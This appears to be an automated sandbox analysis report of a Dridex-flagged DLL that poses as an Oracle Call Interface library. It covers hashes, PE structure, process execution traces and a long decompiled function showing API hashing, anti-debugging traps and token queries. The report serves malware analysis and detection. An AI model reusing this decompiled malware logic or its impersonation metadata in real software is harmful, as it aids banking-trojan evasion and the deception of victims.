Size (bytes):	1572864
Entropy (8bit):	4.23993506854759
Encrypted:	false
SSDEEP:	12288:teR8rJvlXp1Z77yBoa9mBdVSed4+hcq0Wu5SJKcGnLa+OcKM:oR8rJvlXp117yB6ke
MD5:	5FCCAA1F580580ADFBA6D01B21B7760A
SHA1:	F41F9AEE67E8C84AB55DC92F23CD540559C1FF98
SHA-256:	9372D3323C0368D1EFF1CE7DEA255304D280BC31A2B6262670F84505079BEFD5
SHA-512:	9454EF57659476E65F95F73C863813221EE10473AB7631DA1FD038F2DC32F11A58AC479AED13ED9CFB865661318BACF48E3B4B070B3A35644BF4297ED50AA641
Malicious:	false
Reputation:	low
Preview:	regfH...H...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.Z.ck................................................................................................................................................................................................................................................................................................................................................n.>........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	3.4054285395115174
Encrypted:	false
SSDEEP:	384:9ToIi5K51Pv4EgnVVeeDze+1NKZtj2T8Gpw81533SY1:BgKdg/eeDzewNYtjTGpw8LSY
MD5:	2D4DC3EEC62F40AD1FD716F5AB51E0FB
SHA1:	11B406A201ADFC26F59007A628BCD3C573FD2CA9
SHA-256:	7F8B4D9FC5F08107BB29EC36163C697A57713D1592BD83ACEDA0E28488FE3AFF
SHA-512:	9E4C3BC14D015FB92A09277058140A7D5D86A8FE49E4239099482869B7159181580690BDF0737F60119E54C6A22DD5A0F65F11D07F576D679266B3192021249B
Malicious:	false
Reputation:	low
Preview:	regfG...G...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.Z.ck................................................................................................................................................................................................................................................................................................................................................n.>HvLE.N......G..............:.r............................... ..hbin................p.\..,..........nk,....ck................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ....ck....... ........................... .......Z.......................Root........lf......Root....nk ....ck................................... ...............*...............DeviceCensus.......................vk..................WritePermissionsCheck.......p...

Static File Info

General
File type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.322542196260445
TrID:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60% Generic Win/DOS Executable (2004/3) 0.20% DOS Executable Generic (2002/1) 0.20% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll
File size:	544768
MD5:	5c9f3e803604beb0fd134699e214db4c
SHA1:	3e775ec10dce6ce1bfc8c7aa299eef7e762c5fcc
SHA256:	a7efe0ee7f8d77a65b1fff3ba0cee76acb43223365dc348fa43ceecf93bcf7f0
SHA512:	b9a1d3d646c998e8406698c3e4a25827de905f65cdd940cfaa396aa9d16ef9773fc0f6af29b68b697d7eee54004fdac431a09706877bd97f0a5c409d735f2a13
SSDEEP:	6144:54+RYf/Mv1UvT4vjYf/Glpov3KvfMvLo+jwHk3UryzU3+R7ff4evm35IQku4+pMe:54t2UAogoOwhx7nA4+pMpg
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........R...<...<...<..k....<...=.S.<.=.....<.......<.......<.t.?...<.t.=.4.<.L.9...<.t...0.<..k....<..0..x.<.......<..1....<..k....<

File Icon


Icon Hash:	74f0e4ecccdce0e4

Static PE Info

General
Entrypoint:	0x10004db0
Entrypoint Section:	.rdata
Digitally signed:	false
Imagebase:	0x10000000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0x61C2E245 [Wed Dec 22 08:31:01 2021 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	e980d287af7ef0ccd616c6efb9daaae8

Entrypoint Preview

Instruction
inc eax
mov edx, 00000003h
cmpps xmm1, xmm0, 02h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
add edx, 04h
jmp 00007F29A49C6401h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push esi
push edi
push ebx
and esp, FFFFFFF8h
sub esp, 00000090h
mov eax, dword ptr [ebp+08h]
mov byte ptr [esp+00000083h], 00000064h
mov dword ptr [esp+70h], 02263442h
mov dword ptr [esp+44h], eax
call 00007F29A49C9F8Ah
mov ecx, eax
mov edx, eax
mov esi, dword ptr [eax+3Ch]
movzx edi, word ptr [esp+0000008Ah]
mov bx, di
mov dword ptr [esp+40h], eax
mov eax, edi
xor eax, 0000E2E7h
mov word ptr [esp+3Eh], ax
mov al, byte ptr [esp+77h]
mov byte ptr [esp+3Dh], al
mov eax, dword ptr [esp+00000084h]
mov dword ptr [esp+38h], esi
mov si, word ptr [esp+3Eh]
mov word ptr [eax+eax+00000000h], si

Rich Headers

Programming Language:

[IMP] VS2015 UPD1 build 23506
[C++] VS2012 UPD1 build 51106
[ASM] VS2012 build 50727
[ASM] VS2012 UPD2 build 60315
[LNK] VS2010 SP1 build 40219
[EXP] VS2010 SP1 build 40219
[RES] VS2015 UPD1 build 23506
[IMP] VS2010 build 30319
[ASM] VS2015 UPD1 build 23506
[C++] VS2017 v15.5.4 build 25834
[EXP] VS2012 UPD4 build 61030
[C++] VS2008 build 21022
[ASM] VS2010 SP1 build 40219

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x7c029	0x60	.rdata
IMAGE_DIRECTORY_ENTRY_IMPORT	0x7c08c	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x84000	0x2f0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x85000	0x1138	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x6030	0x38	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x44	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.rdata	0x1000	0x6e65	0x7000	False	0.391671316964	data	4.47997370834	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x7424e	0x75000	False	0.316222622863	data	7.44066022726	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x7d000	0x6190	0x5000	False	0.24609375	data	5.03782298504	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x84000	0x9e6	0x1000	False	0.09033203125	data	0.789164600932	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x85000	0x1138	0x2000	False	0.2421875	data	4.12390144992	IMAGE_SCN_TYPE_COPY, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x84060	0x290	MS Windows COFF PA-RISC object file	English	United States

Imports

DLL	Import
WINSPOOL.DRV	EnumFormsW
ADVAPI32.dll	RegCloseKey, QueryServiceStatusEx, AccessCheck
WS2_32.dll	WSACleanup
USER32.dll	GetWindowTextA
KERNEL32.dll	CloseHandle, GetModuleHandleW, GetFileSize, OutputDebugStringA, IsDebuggerPresent, GetModuleFileNameW

Version Infos

Description	Data
OriginalFilename	Iha.dll
FileDescription	Oracle Call Interface
FileVersion	2.3.7.0.0
Legal Copyright	Copyright Oracle Corporation 1979, 2001. All rights reserved.
CompanyName	Oracle Corporation
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: loaddll32.exe PID: 5212 Parent PID: 5316

General

Start time:	20:37:37
Start date:	22/12/2021
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll"
Imagebase:	0x1e0000
File size:	116736 bytes
MD5 hash:	7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000000.00000002.1058145995.000000006E701000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: cmd.exe PID: 6932 Parent PID: 5212

General

Start time:	20:37:37
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1
Imagebase:	0x11d0000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 484 Parent PID: 6932

General

Start time:	20:37:38
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll",#1
Imagebase:	0xc10000
File size:	61952 bytes
MD5 hash:	D7CA562B0DB4F4DD0F03A89A1FDAD63D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.668687209.000000006E701000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000000.666259789.000000006E701000.00000020.00020000.sdmp, Author: Joe Security Rule: JoeSecurity_Dridex_1, Description: Yara detected Dridex unpacked file, Source: 00000002.00000002.700452681.000000006E701000.00000020.00020000.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: WerFault.exe PID: 6720 Parent PID: 484

General

Start time:	20:37:41
Start date:	22/12/2021
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 484 -s 684
Imagebase:	0xb60000
File size:	434592 bytes
MD5 hash:	9E2B8ACAD48ECCA55C0230D63623661B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: loaddll32.exe PID: 5212 Parent PID: 5316 loaddll32.exeCOMMON

Executed Functions

Function 6E710730, Relevance: 5.2, APIs: 3, Instructions: 650
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E6E710730(void* __ecx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				intOrPtr _t155;
				signed char* _t159;
				char _t162;
				void* _t180;
				intOrPtr _t189;
				char _t190;
				intOrPtr _t196;
				intOrPtr _t200;
				void* _t203;
				void* _t212;
				void* _t213;
				void* _t215;
				void* _t216;
				void* _t223;
				void* _t238;
				void* _t241;
				void* _t244;
				void* _t247;
				void* _t250;
				void* _t254;
				void* _t259;
				void* _t265;
				void* _t268;
				int _t271;
				void* _t272;
				void* _t276;
				void* _t277;
				void* _t278;
				void* _t282;
				int _t288;
				intOrPtr* _t291;
				signed char _t294;
				signed char _t295;
				intOrPtr* _t320;
				intOrPtr* _t325;
				intOrPtr* _t363;
				char _t364;
				intOrPtr* _t372;
				void* _t377;
				void* _t382;
				void* _t383;
				void* _t384;
				void* _t385;
				void* _t386;
				void* _t387;
				void* _t393;
				void* _t395;
				void* _t401;
				void* _t403;
				intOrPtr* _t404;
				signed int _t406;
				intOrPtr* _t409;
				void* _t411;
				signed int _t413;
				void* _t414;
				void* _t415;
				void* _t420;
				intOrPtr* _t423;
				void* _t425;
				void** _t427;
				void* _t428;
				void* _t429;

				_t414 = __ecx;
				_t155 =  *0x6e71d1f8;
				if(_t155 == 0x4c71e88d) {
					_t155 = E6E71361C(0x30);
					 *0x6e71d1f8 = _t155;
				}
				if( *((char*)(_t155 + 0xb)) == 0 || _t414 != 0) {
					_t415 = _t428 + 0x48;
					E6E713698(_t415, 0, 0x11c);
					_t429 = _t428 + 0xc;
					 *((intOrPtr*)(_t429 + 0x48)) = 0x11c;
					if(E6E71306C(0x8e844d1e, 0xcf311107, 0x8e844d1e, 0x8e844d1e) != 0) {
						_push(_t415);
						asm("int3");
						asm("int3");
					}
					_t404 =  *0x6e71d1f8;
					_t159 = _t429 + 0x4c;
					_t294 =  *_t159;
					 *(_t404 + 8) = _t294;
					_t295 = _t159[4];
					 *(_t404 + 9) = _t295;
					 *((char*)(_t404 + 0xa)) = _t159[0x110];
					 *((intOrPtr*)(_t404 + 4)) =  *((intOrPtr*)(_t429 + 0x54));
					 *((char*)(_t404 + 0xc)) = 0 | _t159[0x116] != 0x00000001;
					 *_t404 = (_t295 & 0x000000ff) + ((_t294 & 0x000000ff) << 4) - 0x50;
					_t162 = E6E710FF8(_t404);
					 *(_t429 + 0x198) = 0;
					 *((char*)( *0x6e71d1f8 + 0xb)) = _t162;
					_t363 = E6E71306C(0x150c05fc, 0x1da4d409, _t162, _t162);
					if(_t363 == 0) {
						L12:
						_t364 = 0;
						L13:
						 *((char*)( *0x6e71d1f8 + 0x28)) = _t364;
						if( *((intOrPtr*)(E6E710730(0))) >= 0x10) {
							_push(6);
							memcpy(_t429 + 0x164, 0x6e71bce0, 0 << 2);
							_t429 = _t429 + 0xc;
							 *((intOrPtr*)(_t429 + 0x1c)) = 0;
							E6E70F584(_t429 + 0x24, 0);
							_t406 = 0;
							__eflags = 0;
							do {
								E6E70F828(_t429 + 0x24, E6E70F4CC(_t429 + 0x20) + 4);
								 *((intOrPtr*)(E6E70F4BC(_t429 + 0x24, E6E70F4CC(_t429 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t429 + 0x164 + _t406 * 4));
								_t406 = _t406 + 1;
								 *((intOrPtr*)(_t429 + 0x1c)) =  *((intOrPtr*)(_t429 + 0x1c)) + 1;
								__eflags = _t406 - 6;
							} while (_t406 < 6);
							_push(0);
							E6E715580(_t429 + 0xc, _t429 + 0x1c, 0x80000002);
							E6E70F654(_t429 + 0x20);
							E6E7155B0(_t429 + 8, _t429 + 0x1c0, 0xc0092a94);
							_t180 = E6E715864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c0)));
							_t407 = _t180;
							E6E70DFA4(_t429 + 0x1c0);
							__eflags = _t180;
							if(_t180 != 0) {
								E6E7155B0(_t429 + 8, _t429 + 0x1c8, 0x1e55aaec);
								_t420 = E6E715864(_t429 + 4, __eflags,  *((intOrPtr*)(_t429 + 0x1c8)));
								E6E70DFA4(_t429 + 0x1c8);
								_t407 = _t429 + 0x1d0;
								E6E7155B0(_t429 + 8, _t429 + 0x1d0, 0x360d0c74);
								_t401 = E6E715864(_t429 + 4, __eflags,  *(_t429 + 0x1d0));
								E6E70DFA4(_t429 + 0x1d0);
								__eflags = _t420;
								if(_t420 != 0) {
									__eflags = _t420 - 5;
									if(_t420 != 5) {
										__eflags = _t420 - 2;
										if(_t420 != 2) {
											L58:
											E6E70CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L65:
												_t189 = 0;
												__eflags = 0;
												 *(_t429 + 4) = 0;
												goto L66;
											}
											_t382 =  *(_t429 + 4);
											__eflags = _t382;
											if(_t382 == 0) {
												L61:
												_t238 = 1;
												L63:
												__eflags = _t238;
												if(_t238 == 0) {
													E6E715558(_t382);
												}
												goto L65;
											}
											__eflags = _t382 - 0xffffffff;
											if(_t382 != 0xffffffff) {
												_t238 = 0;
												__eflags = 0;
												goto L63;
											}
											goto L61;
										}
										__eflags = _t401 - 1;
										if(_t401 != 1) {
											goto L58;
										}
										E6E70CFDC(_t429 + 0xc);
										__eflags =  *((char*)(_t429 + 8));
										if( *((char*)(_t429 + 8)) == 0) {
											L57:
											 *(_t429 + 4) = 0;
											_t189 = 5;
											goto L66;
										}
										_t383 =  *(_t429 + 4);
										__eflags = _t383;
										if(_t383 == 0) {
											L53:
											_t241 = 1;
											L55:
											__eflags = _t241;
											if(_t241 == 0) {
												E6E715558(_t383);
											}
											goto L57;
										}
										__eflags = _t383 - 0xffffffff;
										if(_t383 != 0xffffffff) {
											_t241 = 0;
											__eflags = 0;
											goto L55;
										}
										goto L53;
									}
									__eflags = _t401;
									if(_t401 != 0) {
										__eflags = _t401 - 1;
										if(_t401 == 1) {
											E6E70CFDC(_t429 + 0xc);
											__eflags =  *((char*)(_t429 + 8));
											if( *((char*)(_t429 + 8)) == 0) {
												L121:
												 *(_t429 + 4) = 0;
												_t189 = 4;
												goto L66;
											}
											_t384 =  *(_t429 + 4);
											__eflags = _t384;
											if(_t384 == 0) {
												L117:
												_t244 = 1;
												L119:
												__eflags = _t244;
												if(_t244 == 0) {
													E6E715558(_t384);
												}
												goto L121;
											}
											__eflags = _t384 - 0xffffffff;
											if(_t384 != 0xffffffff) {
												_t244 = 0;
												__eflags = 0;
												goto L119;
											}
											goto L117;
										}
										goto L58;
									}
									E6E70CFDC(_t429 + 0xc);
									__eflags =  *((char*)(_t429 + 8));
									if( *((char*)(_t429 + 8)) == 0) {
										L45:
										 *(_t429 + 4) = 0;
										_t189 = 3;
										goto L66;
									}
									_t385 =  *(_t429 + 4);
									__eflags = _t385;
									if(_t385 == 0) {
										L41:
										_t247 = 1;
										L43:
										__eflags = _t247;
										if(_t247 == 0) {
											E6E715558(_t385);
										}
										goto L45;
									}
									__eflags = _t385 - 0xffffffff;
									if(_t385 != 0xffffffff) {
										_t247 = 0;
										__eflags = 0;
										goto L43;
									}
									goto L41;
								}
								__eflags = _t401;
								if(_t401 != 0) {
									goto L58;
								}
								E6E70CFDC(_t429 + 0xc);
								__eflags =  *((char*)(_t429 + 8));
								if( *((char*)(_t429 + 8)) == 0) {
									L35:
									 *(_t429 + 4) = 0;
									_t189 = 2;
									goto L66;
								}
								_t386 =  *(_t429 + 4);
								__eflags = _t386;
								if(_t386 == 0) {
									L31:
									_t250 = 1;
									L33:
									__eflags = _t250;
									if(_t250 == 0) {
										E6E715558(_t386);
									}
									goto L35;
								}
								__eflags = _t386 - 0xffffffff;
								if(_t386 != 0xffffffff) {
									_t250 = 0;
									__eflags = 0;
									goto L33;
								}
								goto L31;
							}
							E6E70CFDC(_t429 + 0xc);
							__eflags =  *((char*)(_t429 + 8));
							if( *((char*)(_t429 + 8)) == 0) {
								L25:
								 *(_t429 + 4) = 0;
								_t189 = 1;
								goto L66;
							}
							_t387 =  *(_t429 + 4);
							__eflags = _t387;
							if(_t387 == 0) {
								L21:
								_t254 = 1;
								L23:
								__eflags = _t254;
								if(_t254 == 0) {
									E6E715558(_t387);
								}
								goto L25;
							}
							__eflags = _t387 - 0xffffffff;
							if(_t387 != 0xffffffff) {
								_t254 = 0;
								__eflags = 0;
								goto L23;
							}
							goto L21;
						} else {
							_t189 = 1;
							L66:
							 *((intOrPtr*)( *0x6e71d1f8 + 0x24)) = _t189;
							_t190 = E6E711030(0xffffffffffffffff);
							_t320 =  *0x6e71d1f8;
							 *((char*)(_t320 + 0x29)) = _t190;
							 *((intOrPtr*)(_t320 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t320 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6e71d1f8 + 0x2c)) = E6E7110A4(0x6e71d1f8, 0xffffffffffffffff);
								L78:
								if(E6E71306C(0x8e844d1e, 0x925d7fea, 0x8e844d1e, 0x8e844d1e) != 0) {
									GetSystemInfo(_t429 + 0x164); // executed
								}
								_t196 =  *0x6e71d1f8;
								_t291 = _t429 + 0x178;
								_t409 = _t429 + 0x170;
								 *((short*)(_t196 + 0xe)) =  *_t291;
								 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t291 - 0x10));
								 *((intOrPtr*)(_t196 + 0x14)) =  *((intOrPtr*)(_t291 - 0xc));
								 *((intOrPtr*)(_t196 + 0x18)) =  *_t409;
								 *((intOrPtr*)(_t196 + 0x1c)) =  *((intOrPtr*)(_t409 + 0x10));
								return _t196;
							}
							 *(_t429 + 0x19c) = 0;
							_t372 = E6E71306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
							if(_t372 == 0) {
								L74:
								_t200 =  *0x6e71d1f8;
								if( *((char*)(_t200 + 0x28)) == 0) {
									 *((intOrPtr*)(_t200 + 0x2c)) = 3;
								} else {
									 *((intOrPtr*)(_t200 + 0x2c)) = 5;
								}
								goto L78;
							}
							_push(_t429 + 0x19c);
							_push(8);
							_push(0xffffffff);
							if( *_t372() == 0) {
								_t203 = E6E7135F0(_t407);
								__eflags = _t203;
								if(_t203 != 0) {
									goto L74;
								}
							}
							 *(_t429 + 0x30) =  *(_t429 + 0x19c);
							 *((char*)(_t429 + 0x34)) = 1;
							 *(_t429 + 0x1a4) = 0;
							_t325 = E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
							if(_t325 != 0) {
								_push(_t429 + 0x1a4);
								_push(0);
								_push(0);
								_push(1);
								_push( *(_t429 + 0x1ac));
								if( *_t325() == 0) {
									E6E7135F0(_t407);
								}
							}
							_t206 =  *(_t429 + 0x1a4);
							if( *(_t429 + 0x1a4) != 0) {
								E6E70F584(_t429 + 0x18c, _t206);
								_t411 = E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
								__eflags = _t411;
								if(_t411 == 0) {
									L133:
									E6E70F654(_t429 + 0x188);
									goto L72;
								}
								_t212 = E6E70F4BC(_t429 + 0x18c, 0);
								_t213 = E6E70F4CC(_t429 + 0x188);
								_t215 =  *_t411( *(_t429 + 0x1ac), 1, _t212, _t213, _t429 + 0x1a4);
								__eflags = _t215;
								if(_t215 == 0) {
									_t216 = E6E7135F0(_t411);
									__eflags = _t216;
									if(_t216 != 0) {
										goto L133;
									}
								}
								_t423 = E6E70F4BC(_t429 + 0x18c, 0);
								E6E70DF4C(_t429 + 0x1b4, 0);
								 *(_t429 + 0x1ac) = 0;
								_t377 = E6E71306C(0x150c05fc, 0xfc1a24a1, 0x150c05fc, 0x150c05fc);
								__eflags = _t377;
								if(_t377 != 0) {
									 *_t377( *_t423, _t429 + 0x1ac);
								}
								E6E70DFC0(_t429 + 0x1b4,  *(_t429 + 0x1ac));
								_t223 = E6E71306C(0x8e844d1e, 0xda6a2597, 0x8e844d1e, 0x8e844d1e);
								__eflags = _t223;
								if(_t223 != 0) {
									_push( *(_t429 + 0x1ac));
									asm("int3");
									asm("int3");
								}
								E6E70E06C(_t429 + 0x1b8 - 8, _t429 + 0x1b8);
								_t425 = E6E714FFC( *((intOrPtr*)(_t429 + 0x1b8)), E6E70E8A8( *((intOrPtr*)(_t429 + 0x1b8)), 0x7fffffff));
								E6E70DFA4(_t429 + 0x1b8);
								E6E70DFA4(_t429 + 0x1b0);
								E6E70F654(_t429 + 0x188);
								__eflags =  *((char*)(_t429 + 0x34));
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E70BB44(_t429 + 0x30);
								}
								__eflags = _t425 - 0x6df4cf7;
								if(_t425 != 0x6df4cf7) {
									goto L74;
								} else {
									 *((intOrPtr*)( *0x6e71d1f8 + 0x2c)) = 6;
									goto L78;
								}
							} else {
								L72:
								if( *((char*)(_t429 + 0x34)) != 0) {
									E6E70BB44(_t429 + 0x30);
								}
								goto L74;
							}
						}
					}
					_push(_t429 + 0x198);
					_push(8);
					_push(0xffffffff);
					if( *_t363() == 0) {
						_t259 = E6E7135F0(_t404);
						__eflags = _t259;
						if(_t259 != 0) {
							goto L12;
						}
					}
					 *(_t429 + 0x14) =  *(_t429 + 0x198);
					 *((char*)(_t429 + 0x18)) = 1;
					 *(_t429 + 0x1a0) = 0;
					if(E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) != 0) {
						_t288 = GetTokenInformation( *(_t429 + 0x1a8), 2, 0, 0, _t429 + 0x1a0); // executed
						if(_t288 == 0) {
							E6E7135F0(_t404);
						}
					}
					_t262 =  *(_t429 + 0x1a0);
					if( *(_t429 + 0x1a0) != 0) {
						E6E70F584(_t429 + 0x3c, _t262);
						_t265 = E6E71306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc);
						_t407 = _t265;
						__eflags = _t265;
						if(_t265 == 0) {
							L107:
							E6E70F654(_t429 + 0x38);
							goto L10;
						}
						_t268 = E6E70F4BC(_t429 + 0x3c, 0);
						_t271 = GetTokenInformation( *(_t429 + 0x1a8), 2, _t268, E6E70F4CC(_t429 + 0x38), _t429 + 0x1a0); // executed
						__eflags = _t271;
						if(_t271 == 0) {
							_t272 = E6E7135F0(_t407);
							__eflags = _t272;
							if(_t272 != 0) {
								goto L107;
							}
						}
						_t427 = E6E70F4BC(_t429 + 0x3c, 0);
						 *(_t429 + 0x1d8 - 0x30) = 0;
						asm("movsd");
						asm("movsb");
						asm("movsb");
						_t407 = E6E71306C(0x150c05fc, 0x2351aaca, 0x150c05fc, 0x150c05fc);
						__eflags = _t407;
						if(_t407 == 0) {
							goto L107;
						}
						_t276 = _t429 + 0x1a8;
						_t277 =  *_t407(_t276 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t276);
						__eflags = _t277;
						if(_t277 == 0) {
							_t278 = E6E7135F0(_t407);
							__eflags = _t278;
							if(_t278 != 0) {
								goto L107;
							}
						}
						_t403 =  *(_t429 + 0x1a8);
						__eflags =  *_t427;
						if( *_t427 <= 0) {
							L101:
							__eflags = _t403;
							if(_t403 == 0) {
								L103:
								_t393 = 1;
								L105:
								__eflags = _t393;
								if(_t393 == 0) {
									E6E710FD4(_t403, _t407, _t403);
								}
								goto L107;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t393 = 0;
								__eflags = 0;
								goto L105;
							}
							goto L103;
						}
						_t413 = 0;
						__eflags = 0;
						do {
							_t282 = E6E71306C(0x150c05fc, 0xb4757511, 0x150c05fc, 0x150c05fc);
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							_push( *((intOrPtr*)(_t427 + 4 + _t413 * 8)));
							_push( *(_t429 + 0x1ac));
							asm("int3");
							asm("int3");
							__eflags = _t282;
							if(_t282 == 0) {
								goto L100;
							}
							__eflags = _t403;
							if(_t403 == 0) {
								L93:
								_t395 = 1;
								L95:
								__eflags = _t395;
								if(_t395 == 0) {
									E6E710FD4(_t403, _t413, _t403);
								}
								E6E70F654(_t429 + 0x38);
								__eflags =  *((char*)(_t429 + 0x18));
								if( *((char*)(_t429 + 0x18)) != 0) {
									E6E70BB44(_t429 + 0x14);
								}
								_t364 = 1;
								goto L13;
							}
							__eflags = _t403 - 0xffffffff;
							if(_t403 != 0xffffffff) {
								_t395 = 0;
								__eflags = 0;
								goto L95;
							}
							goto L93;
							L100:
							_t413 = _t413 + 1;
							__eflags = _t413 -  *_t427;
						} while (_t413 <  *_t427);
						goto L101;
					}
					L10:
					if( *((char*)(_t429 + 0x18)) != 0) {
						E6E70BB44(_t429 + 0x14);
					}
					goto L12;
				} else {
					return _t155;
				}
			}

0x6e71073f
0x6e710741
0x6e710748
0x6e710fc7
0x6e710fcd
0x6e710fcd
0x6e710752
0x6e71075e
0x6e71076a
0x6e71076f
0x6e71077c
0x6e71078d
0x6e71078f
0x6e710790
0x6e710791
0x6e710791
0x6e710792
0x6e710796
0x6e71079a
0x6e71079f
0x6e7107a2
0x6e7107a8
0x6e7107c2
0x6e7107c9
0x6e7107cc
0x6e7107cf
0x6e7107d1
0x6e7107dd
0x6e7107ea
0x6e7107f7
0x6e7107fb
0x6e710887
0x6e710887
0x6e710889
0x6e71088d
0x6e710898
0x6e7108ae
0x6e7108b1
0x6e7108b1
